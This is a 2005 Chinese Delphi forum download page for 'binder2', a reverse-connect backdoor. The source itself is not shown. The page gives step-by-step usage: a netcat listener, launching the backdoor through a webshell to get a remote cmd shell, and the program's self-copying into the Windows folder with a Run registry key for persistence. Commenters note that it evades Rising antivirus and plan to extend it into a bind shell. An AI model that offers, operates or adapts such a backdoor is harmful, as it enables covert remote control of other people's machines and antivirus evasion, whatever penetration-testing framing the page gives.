捐赠 | 广告 | 注册 | 发布 | 上传 | 关于我们    
  沪ICP备05001939号 DELPHI盒子 | 盒子论坛 | 盒子文章 | 盒子问答悬赏 | 最新更新 | 论坛检索 | 下载中心 | 高级搜索    
  精品专区 | 繁體中文 | 奖励公告栏 | 直通车账号登陆 | 关闭GOOGLE广告 | 临时留言    
盒子资源分类
全部展开 - 全部合拢
Delphi版binder2反弹式后门程序及工具
关键字:socket 后门 反弹 kol api binder 注册表
来 自:原创
平 台:Win9x,Win2k/XP/NT,Win2003 下载所需:0 火柴
深浅度:中级 完成时间:2005/6/16
发布者:hnxyy 发布时间:2005/6/16
编辑器:DELPHI7 语  种:简体中文
分 类:网络 下载浏览:3429/12918
加入到我的收藏
下载错误报错
登陆以后才能下载
 用户名:
 密 码:
自动登陆(30天有效)
图片如果打不开,说明流量不够了,请稍候下载……
Winsock2为kol socket单元文件,修改自c版代码binder2.c
源代码附c版和Delphi版 binder2程序。

使用说明:
binder2.exe 反弹式后门程序

简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.

用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
kol_binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.

注意:
程序本身会创建一个自启动方法,如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:\winnt\下名为binder2.exe,并在HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)

Code by hnxyy 
Date:2005/6/16
QQ:19026695

www.wrsky.com
火狐技术联盟
Google
 
本站原创作品,未经作者许可,严禁任何方式转载;转载作品,如果侵犯了您的权益,请联系我们
龙脉加密锁 15元起 Grid++Report 报表 申请支付@网
 相关文章
Delphi编写本地溢出反向连接通用ShellCode
dna32r 2005/11/3 下+2279/浏+13160 评+2
通用ShellCode内存动态API搜索引擎 (没有使…
dna32r 2005/7/26 下+1874/浏+13538 评+4
Delphi版binder2反弹式后门程序及工具
hnxyy 2005/6/16 下+3429/浏+12919 评+6
相关评论
共有评论6条 当前显示最后6条评论
dna32r 2005/6/17 8:36:57
感谢发布。回去修改成双向绑定的shell
反向连接+本地端口复用.工作量不算大。。可以承受
hnxyy 2005/6/17 8:44:21
dna32r:

感谢关注,以后多多指教
tim001 2005/6/17 9:29:52
谢谢
chbqq 2005/6/17 17:23:04
c的一下子被瑞星发现被kill,delphi为什么没被发现,改注册表瑞星也没反应,请说明下
hnxyy 2005/6/17 19:17:03
c版的binder2是经典黑客代码,早已被杀毒软件查杀,Delphi版以前没出过,所以不在被杀之列
ok999ok 2006/12/11 21:44:14
可惜的是,2个都逃不过咔吧的追杀.
我要发表评论 查看全部评论
 
  DELPHI盒子版权所有 1999-2023 V4.01 粤ICP备10103342号-1 更新RSS列表